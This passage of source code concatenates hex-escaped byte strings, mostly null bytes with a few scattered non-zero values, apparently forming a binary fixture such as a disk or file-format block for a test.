"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x13\xE0\xBA\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\x06\xF5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x3D\xD3\xB8\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\xF5\x03\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xDD\x69\xD0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x2D\x39\xEB\x74\xE3\x44\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\xEC\x65\x76\xC2\x9A\xE6\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\xB3\x45\xF9\xB3\x28\x0E\x62\xF8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x90\x75\xC1\x9F\x12". + "\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x06\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA0\x4E\x0A\xC6\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\x04\xF5". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\xFD\xD2\x1E\x57\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x02\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5D\x9C\x14\x91". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x9B\x0F". + "\x9A\x67\x55\x84\x54\xEC\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x43\x65\xAF\xC2\xEC\xE6\x00\x43\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x91\xC9\x24\x7E\xBC\xC7\x09\x70\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x47\x90\xAD\xC1\xEA\x12\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x07\x01". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + 